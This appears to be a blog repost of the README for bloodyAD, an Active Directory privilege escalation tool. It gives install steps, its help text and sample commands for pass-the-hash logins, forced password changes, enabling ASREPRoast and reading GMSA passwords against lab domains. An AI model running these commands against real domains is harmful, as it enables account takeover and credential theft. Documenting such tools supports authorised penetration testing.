Kali Linux

bloodyAD : Active Directory Privilege Escalation Framework

bloodyAD.py is an Active Directory privilege escalation swiss army knife

Description

This tool can perform specific LDAP/SAMR calls to a domain controller in order to perform AD privesc.

bloodyAD supports authentication using cleartext passwords, pass-the-hash, pass-the-ticket or certificates and binds to LDAP services of a domain controller to perform AD privesc.

It is designed to be used transparently with a SOCKS proxy.

Installation

First if you run it on Linux, you must have libkrb5-dev installed on your OS in order for kerberos to work:

Debian/Ubuntu/Kali
apt-get install libkrb5-dev
Centos/RHEL
yum install krb5-devel
Fedora
dnf install krb5-devel
Arch Linux
pacman -S krb5

A python package is available:

pip install bloodyAD
bloodyAD –host 172.16.1.15 -d bloody.local -k changePassword john.doe ‘Password123!’

Or you can clone the repo:

git clone –depth 1 https://github.com/CravateRouge/bloodyAD
pip install .
bloodyAD –host 172.16.1.15 -d bloody.local -k changePassword john.doe ‘Password123!’

Dependencies

  • Python 3
  • DSinternals
  • Impacket
  • Ldap3
  • Gssapi (linux) or Winkerberos (Windows)

Usage

Simple usage:

bloodyAD –host 172.16.1.15 -d bloody.local -u jane.doe -p :70016778cb0524c799ac25b439bd6a31 changePassword john.doe ‘Password123!’

Note: You can find more examples on https://cravaterouge.github.io/

List of all available functions:

[bloodyAD]$ bloodyAD -h
usage: bloodyAD [-h] [-d DOMAIN] [-u USERNAME] [-p PASSWORD] [-k] [-c CERTIFICATE] [-s] [–host HOST]
{getObjectAttributes,setAttribute,addUser,addComputer,delObject,changePassword,addObjectToGroup,addForeignObjectToGroup,delObjectFromGroup,getChildObjects,setShadowCredentials,setGenericAll,setOwner,setRbcd,setDCSync,setUserAccountControl}

AD Privesc Swiss Army Knife
Main options:
-h, –help show this help message and exit
-d DOMAIN, –domain DOMAIN
Domain used for NTLM authentication
-u USERNAME, –username USERNAME
Username used for NTLM authentication
-p PASSWORD, –password PASSWORD
Cleartext password or LMHASH:NTHASH for NTLM authentication
-k, –kerberos
-c CERTIFICATE, –certificate CERTIFICATE
Certificate authentication, e.g: “path/to/key:path/to/cert”
-s, –secure Try to use LDAP over TLS aka LDAPS (default is LDAP)
–host HOST Hostname or IP of the DC (ex: my.dc.local or 172.16.1.3)
Commands:
{getObjectAttributes,setAttribute,addUser,addComputer,delObject,changePassword,addObjectToGroup,addForeignObjectToGroup,delObjectFromGroup,getChildObjects,setShadowCredentials,setGenericAll,setOwner,setRbcd,setDCSync,setUserAccountControl}
Function to call

Useful commands

Get group members
bloodyAD -u john.doe -d bloody -p Password512! –host 192.168.10.2 getObjectAttributes Users member
Get minimum password length policy
bloodyAD -u john.doe -d bloody -p Password512! –host 192.168.10.2 getObjectAttributes ‘DC=bloody,DC=local’ minPwdLength
Get AD functional level
bloodyAD -u Administrator -d bloody -p Password512! –host 192.168.10.2 getObjectAttributes ‘DC=bloody,DC=local’ msDS-Behavior-Version
Get all users of the domain
bloodyAD -u john.doe -d bloody -p Password512! –host 192.168.10.2 getChildObjects ‘DC=bloody,DC=local’ user
Get all computers of the domain
bloodyAD -u john.doe -d bloody -p Password512! –host 192.168.10.2 getChildObjects ‘DC=bloody,DC=local’ computer
Get all containers of the domain
bloodyAD -u john.doe -d bloody -p Password512! –host 192.168.10.2 getChildObjects ‘DC=bloody,DC=local’ container
Enable DONT_REQ_PREAUTH for ASREPRoast
bloodyAD -u Administrator -d bloody -p Password512! –host 192.168.10.2 setUserAccountControl john.doe 0x400000
Disable ACCOUNTDISABLE
bloodyAD -u Administrator -d bloody -p Password512! –host 192.168.10.2 setUserAccountControl john.doe 0x0002 False
Get UserAccountControl flags
bloodyAD -u Administrator -d bloody -p Password512! –host 192.168.10.2 getObjectAttributes john.doe userAccountControl
Read GMSA account password
bloodyAD -u john.doe -d bloody -p Password512 –host 192.168.10.2 getObjectAttributes gmsaAccount$ msDS-ManagedPassword
Read quota for adding computer objects to domain
bloodyAD -u john.doe -d bloody -p Password512! –host 192.168.10.2 getObjectAttributes ‘DC=bloody,DC=local’ ms-DS-MachineAccountQuota

R K

Recent Posts

Understanding the Model Context Protocol (MCP) and How It Works

Introduction to the Model Context Protocol (MCP) The Model Context Protocol (MCP) is an open…

5 days ago

The file Command – Quickly Identify File Contents in Linux

While file extensions in Linux are optional and often misleading, the file command helps decode what a…

6 days ago

How to Use the touch Command in Linux

The touch command is one of the quickest ways to create new empty files or update timestamps…

6 days ago

How to Search Files and Folders in Linux Using the find Command

Handling large numbers of files is routine for Linux users, and that’s where the find command shines.…

6 days ago

How to Move and Rename Files in Linux with the mv Command

Managing files and directories is foundational for Linux workflows, and the mv (“move”) command makes it easy…

6 days ago

How to Create Directories in Linux with the mkdir Command

Creating directories is one of the earliest skills you'll use on a Linux system. The mkdir (make…

6 days ago